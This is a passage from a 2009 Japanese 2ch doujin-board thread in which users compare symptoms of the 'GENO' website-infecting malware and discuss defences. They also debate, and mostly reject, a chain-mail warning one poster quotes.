sqlspdbcなんだけど、自分の組み立てたCPで殆どのファイルが2008/04/14付けの
用になってるんだけどコレってセフセフ?
ちなみに全部起動も要領も大丈夫だったんだけど。

951 :名前欄にスレ名入力推奨@自治スレ:2009/05/16(土) 18:46:39 ID:NG0XsJSj0
>>936
エンジンとウイルス名晒せよw

952 :GENO:2009/05/16(土) 18:46:56 ID:OdBBM1PA0
漏れは
(1)sqlsodbc.chmを改変
(2)cmd.exe、regedit.exeが起動不能
が確認できて、感染しているとわかった。
完全ではないと思うし、他の香具師に適用できるかわからないし、
力業のところもあるが、少なくとも(2)の症状は解消できたので、
経緯を含めて、次レス以降で報告する。

953 :GENO:2009/05/16(土) 18:47:19 ID:6WgPAgbO0
>>950CPじゃねぇ、PCだった

954 :GENO:2009/05/16(土) 18:47:20 ID:/m6gQ1ZiP
>>949
それと今回のGENOは別らしいよ
ダウンアドは前からある別のっだって見たけど

955 :geno:2009/05/16(土) 18:47:58 ID:U58tIYjBO
こんなメールきたw
誰が始めたか分からんがGJ!
――――――――――――――――

※緊急※タチの悪いウイルスが同人サイトにも拡大中

現在新種のコンピュータウイルス「GENOウイルス(通称)」が急速に拡大中です
感染サイトを見ただけで感染発症し、現時点ではセキュリティソフトでの完全な保護は確立されていません
小林製薬や旅行代理店等、大手サイトだけでなく同人サイトにも広まっています

感染するとあなたのパソコンに侵入したウイルスは、ネットに繋がった時点で パスワード、クレジットカードの情報、FTPのパスワードなどを抜く、また、Acrobatが挙動不審になる等の問題を引き起こします
感染者のパソコンからアップされたサイトのファイルにウイルスコードが自動挿入され、そのサイトを見た人を感染させます。
(サイト管理人は自分のサイトのソースを見ることで書き換えを確認することができます)
全ジャンルでサイト管理人・閲覧者に感染チェックを推奨します。


詳細・感染の確認方法・対策、感染ジャンルは以下のまとめ
同人サイト向け・通称「GENOウイルス」対策まとめ
http://www31.atwiki.jp/doujin_vinfo/

※このメールを知り合いの同人サイト管理者・閲覧者に送って下さい※

956 :GENO:2009/05/16(土) 18:48:09 ID:E/Hkrb7LO
>>926
伏せ字にするとまとめ人に拾わないので
情報にカウントされない件

しかしボカロはヤバいな

957 :GENO:2009/05/16(土) 18:48:27 ID:xyYJqHyKO
ウイルスの件を今日知って、感染はしてなかったけど休止にしようと思うんだが
鯖の公式が感染してる場合っていうのはあるのかな?
更新したいんだがそれが怖くて出来ない…

958 :名前欄にスレ名入力推奨@自治スレ:2009/05/16(土) 18:48:31 ID:XpshxGrz0
>>948
それすら判断できない人はふらふら閲覧して感染チェックとかしないで欲しいね
マカーなのかも知れないけどさ

959 :名前欄にスレ名入力推奨@自治スレ:2009/05/16(土) 18:48:41 ID:Se14JChw0
>>950
OSも書いてよう

960 :GENO:2009/05/16(土) 18:49:06 ID:4SxWOZXB0
チェンメみたいにならんといいが

961 :GENO:2009/05/16(土) 18:49:11 ID:oRZKM7s90
>>955
おお!使わせていただくw

962 :GENO:2009/05/16(土) 18:49:21 ID:b/+eltGS0
>>900

>>949
ダウンドアはUSBじゃなかたっけ?

963 :GENO:2009/05/16(土) 18:49:41 ID:APiqzc70O
>>946
ついにポケモンでも出たということか?そうなのか?
もしそうだとさらに広まる恐れがあるな…自ジャンルオワタ

964 :GENO:2009/05/16(土) 18:49:42 ID:A9qSW+uH0
>>952
解消とかいってないでクリーンインストールしてくれよ

965 :GENO:2009/05/16(土) 18:49:47 ID:wC2VoGPT0
チェーンメールは駄目だろ
まとめサイトの印象が悪くなる

966 :883:2009/05/16(土) 18:49:57 ID:ivgR4yei0
まとめさんのアドレスってそのまま貼っていいよな?
「まとめサイトは感染者(疑い)が押し寄せてくるんだからやばい」って
書き込みをどっかでみたんだけど
「閲覧は個人の判断で」とか…かいたほうがいいか?

967 :GENO:2009/05/16(土) 18:49:57 ID:zlsW0HIw0
>>955
内容はともかく最後の一文は駄目だろう
誰彼なしに絨毯爆撃じゃチェーンメール化する

968 :GENO:2009/05/16(土) 18:50:02 ID:6WgPAgbO0
>>959
OSは窓のXP
ちなみに火狐使用してます。

969 :geno:2009/05/16(土) 18:50:16 ID:eO1ln/UG0
プニル使いなんだけど、デフォルトセキュリティからjavaスクリプトを外したら
とりあえずはOK?

970 : :2009/05/16(土) 18:50:38 ID:dhazjnvD0
>>950
sqlspdbcに関しては大丈夫だろう

971 :GENO:2009/05/16(土) 18:50:50 ID:0gY22C790
>>955
GJて・・・
そんな広め方じゃ逆にデマウイルスで削除されるだろう
アホなの?

972 :GENO:2009/05/16(土) 18:51:34 ID:lFaYB71c0
>>966
感染者がなんでもないサイト見たからって、なんでもないサイトが感染するわけじゃなかろ

973 :geno:2009/05/16(土) 18:51:43 ID:jRkFApPe0
とりあえず自PC・サイトの感染被害はなかった
あとは予防策だが火狐のnoscriptだけじゃ心許ないな

974 :GENO:2009/05/16(土) 18:52:19 ID:pbsx4U5a0
>>955
最後のまとめサイトのURLを感染済のURLに書き換えられたらオワタになるな

975 :GENO:2009/05/16(土) 18:52:20 ID:OdBBM1PA0
1.はじまり(2日前)
(1)2日前、Acrobatが異常終了
(2)その後、Googleのリンクをクリックしてもリンクに飛ばない。
(タイムアウトとなり、「サーバーが見つかりません。」エラー)
(3)気になって、いろいろ調べ、レジストリエディタを起動したら、
起動しなかった。コマンドプロンプトも起動しなかった。
(4)いやな汗をかきながら、ぐぐると「レジストリの××のキーを
修正すれば直る。」様なことがいくつかあったが、そのキーが見当たらなかった。
(5)ウイルスバスターでウイルススキャンを行ったが、ウイルスは検出され
なかった。


つづく

976 :GENO:2009/05/16(土) 18:52:21 ID:0gY22C790
最期の一文はデマウイルスの典型的な一文じゃないの
もしそのメールをまんま使われて、ウイルス感染してるサイトにリンク飛ばされる様に
改竄されて使われたらどうするんだ?

ちょっと後先考えずに熱くなりすぎてるやつ頭冷やせよ

977 :GENO:2009/05/16(土) 18:53:13 ID:RghX07DyO
>>955
さすがにチェンメはまずい気がする
改変されたり別の問題が起きるんじゃないか?

978 :GENO:2009/05/16(土) 18:53:14 ID:NddsKjpSO
>>955
私は、そんな一昔前のチェーンメールかのような内容のメールに記載されているURLは
絶対に踏みたくありません

979 :名前欄にスレ名入力推奨@自治スレ:2009/05/16(土) 18:53:20 ID:hX/lFYJM0
フォクすけと俺にGDATAシールド(両手)を装備した



980 :GENO:2009/05/16(土) 18:53:21 ID:YUMGC+3j0
>>956
まとめの中の人拾ってるよ
ちんぷんかんぷんな伏せは今現在消えたし伏せなしをそこまでこだわりまくらなくても…スレが荒れるだけの気がする
まあ自分は何かあればわかるように書くけどね

981 :geno:2009/05/16(土) 18:53:39 ID:bmeWatfA0
>>974
koeeeeee

まとめサイト改竄した奴もいたし、危険だな

982 :名前欄にスレ名入力推奨@自治スレ:2009/05/16(土) 18:53:51 ID:hX/lFYJM0
感染者のPCの中にあるHTMLファイルに勝手にjavascriptが埋め込まれるの?

983 :CERO:2009/05/16(土) 18:54:07 ID:NSWPz6JW0
>>952
頼んます

984 :GENO:2009/05/16(土) 18:54:09 ID:dUhoo+Zw0
メールで伝えてOKなのは、友人間だけだな。
書き手はサイト等で伝えればいいけど、読み専はきほん自衛しかないよね。

985 :geno:2009/05/16(土) 18:54:18 ID:LwX4sLTz0
ブラウザがsafari,つーかマカーなんだけど大丈夫だよね?

986 :GENO:2009/05/16(土) 18:54:19 ID:DwOS+Yc30
ダウンドアか、ありがとう。んじゃバックドアは別物か。
すでに削除済なんだけど、クリーンしてたほうがいいかな。

987 : :2009/05/16(土) 18:54:31 ID:/KVIyYsA0
>>952
感染して、表面上の症状だけ消してもやばいままじゃね?

988 :geno:2009/05/16(土) 18:54:42 ID:ivgR4yei0
>>972
おk ありがとう

チェンメはちょっと怖いな
むしろ感染を広げる気もする

989 :geno:2009/05/16(土) 18:54:56 ID:jRkFApPe0
そんなチェンメまがいなのを広めるぐらいなら
ニコニコにまとめ動画を上げる方がまだよっぽどマシだと思う

990 :GENO:2009/05/16(土) 18:55:05 ID:ylr5R1gd0
チェーンメールをGJはないわ……

991 :GENO:2009/05/16(土) 18:55:16 ID:bVgdtf980
>>955
あっという間にやばいスパムが出回るに全財産賭けられる

992 :GENO:2009/05/16(土) 18:55:26 ID:vNLIWV+e0
まがいと言うか完全にチェンメの類じゃ

993 :GENO:2009/05/16(土) 18:55:26 ID:w2e1m/MuO
>>955の文面はいくら善意で初めてもチェーンメール化するから転送を促す文章は削除してくれ

>>966
まとめサイトは管理人さんしか編集できないから今のところは大丈夫としか言えない

994 :GENO:2009/05/16(土) 18:55:54 ID:RNEPmgHp0
>>973
NoScriptよりPreferences Toolbarおすすめ
javascript、cookie、flashをそれぞれ個別に切れるよ
ましてやImageまで読まないようにできる

995 : :2009/05/16(土) 18:55:58 ID:/KVIyYsA0
>>982
それもあるのかもしれないが、
漏れたパスで勝手に鯖にアクセスされるんだろう

996 :名前欄にスレ名入力推奨@自治スレ:2009/05/16(土) 18:56:17 ID:5AlQPwu90
>>986
ダウンアドとは別物って確か前の方のレスで出てたような

997 :geno:2009/05/16(土) 18:56:56 ID:ztB8Zhmo0
>>982
FTPのパスを抜かれて外部に置いたhtmlが勝手に第三者の手で書き換えられる
んだったと思うが

998 :geno:2009/05/16(土) 18:57:19 ID:bmeWatfA0
>>982
このスレの1から読んで来い

999 :geno:2009/05/16(土) 18:57:23 ID:iR0LjWegO
VIPの祭みたいに興奮しきって冷静な判断が下せてない人もいるね>チェーンメール推奨

1000 :geno:2009/05/16(土) 18:57:45 ID:sZa7+4z70
1000なら感染が止まる

1001 :1001:Over 1000 Thread
  | ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄|
  |    最 後 尾 。  |     このスレッドは1000を超えました。
  |________|
     ∧∧ ||
    (. ゚д゚)||             同人@2ch掲示板
      / づΦ           http://changi.2ch.net/doujin/


249 KB
★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.02 2018/11/22 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)